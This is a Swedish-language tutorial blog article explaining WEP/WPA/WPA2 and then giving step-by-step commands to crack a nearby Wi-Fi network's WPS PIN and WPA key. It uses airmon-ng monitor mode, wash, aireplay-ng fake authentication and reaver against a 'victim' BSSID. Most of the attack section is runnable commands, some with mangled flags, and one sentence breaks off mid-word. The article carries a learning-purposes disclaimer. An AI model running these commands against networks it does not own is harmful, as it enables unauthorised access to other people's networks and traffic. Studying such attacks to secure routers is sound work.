Vi vet alla att de flesta föredrar att sätta ett WiFi-lösenord till sin trådlösa anslutning. Det kan vara så enkelt som 12345 eller så komplicerat som en kombination av flera bokstäver, siffror och tecken. Här är de dåliga nyheterna, det finns ett verktyg vid namn reaver som kan användas för att knäcka ditt WAP/WAP2 WiFi-lösenord.
Om WEP, WAP och WAP2
För att förbättra funktionerna hos WEP (Wired Equivalent Privacy) skapades WiFi Protected Access eller WPA år 2003. Denna tillfälliga förbättring har fortfarande relativt dålig säkerhet men är lättare att konfigurera. WPA använder Temporal Key Integrity Protocol (TKIP) för säkrare kryptering än vad WEP erbjöd.
Ett år senare, 2004, blev WiFi Protected Access 2 tillgängligt. WPA2 har starkare säkerhet och är lättare att konfigurera än de tidigare alternativen. Den största skillnaden med WPA2 är att den använder Advanced Encryption Standard (AES) istället för TKIP.
Vad du behöver.
- En WiFi-adapter som stöder bildskärmsläge
- En dator med WiFi
- Ett WPA-säkrat WiFi-nätverk i närheten
- Reaver är installerad
- Persistens
Jag utgår från att routern är konfigurerad så att den inte använder Push Button Authentication.(PBC)
Vi gör så här
Först måste du, om du använder en virtuell maskin, aktivera din USB-kontroller genom att gå till inställningar, klicka sedan på USB och välj din USB-enhet.
NB: Kontrollera att det trådlösa adaptern som du använder har stöd för bildskärmsläge.
Därefter kör du följande kommando:
iwconfig
Detta kommando visar endast trådlösa gränssnitt
Kör:
sudo ifconfig wlan0 down
Detta inaktiverar WiFi
Sedan:
sudo airmon-ng check kill
Detta kommando dödar alla processer som kan störa användningen av mitt gränssnitt i monitorläge. Det dödar nätverkshanteraren så att det inte finns något internet.
Därefter körs:
iwconfig wlan0 mode monitor
Detta kommando ändrar läget från hanterat läge till övervakningsläge.
Managed mode är standardläget för alla trådlösa enheter.
Anledningen till att vi behöver ändra läget från managed till monitor mode är att vi inte bara vill fånga upp de paket som har mac-adressen till vår enhet utan alla paket, även de som skickas till routern och andra enheter. Detta är endast möjligt när wifi-adaptern är i monitorläge.
Därefter körs:
sudo ifconfig wlan0 up
Detta för wifi upp igen.
Därefter körs:
iwconfig
Detta är för att kontrollera om vårt läge har ändrats från managed till monitor. Om så är fallet ska det anges i terminalen.
Figuren nedan visar att läget har ändrats till monitor.
wash - interface wlan0
Detta visar alla WPS-aktiverade Aps som använder trådlöst gränssnitt.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
För mac ID öppna en ny flik och skriv ifconfig. Kopiera de första 12 siffrorna från unspec i wlan0.
Tryck inte på ENTER ännu.
Öppna en annan ny flik.
Säkerställ att du har reaver installerat. Om du inte har det, kör följande kommando.
Sudo apt-get install aircrack-ng reaver
Detta kommer att installera reaver.
Reaver brute force pin och associerar den med målet, när den väl har pin använder den den för att beräkna den faktiska WAP/WAP2-nyckeln.
Kör sedan följande kommando:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Tryck på enter på den här fliken och tryck också på enter på den andra fliken som jag sa åt dig att inte trycka på enter.
Detta bör ta ett par minuter eftersom den prövar alla möjliga kombinationer och till slut kommer den att ge dig WPS-pinnbeteckningen, WAP-lösenordet och namnet på Wi-Fi-
DISCLAIMER. Den här artikeln är för inlärningsändamål, vi är inte ansvariga för eventuella skador som orsakas när man hänvisar till den.
Artikel av Restercuter Nyawira, en SheHacks KE-medlem, utbildare och cybersäkerhetsentusiast. Du hittar henne på LinkedIn (Restercuter Nyawira) och Twitter @Restercuter1.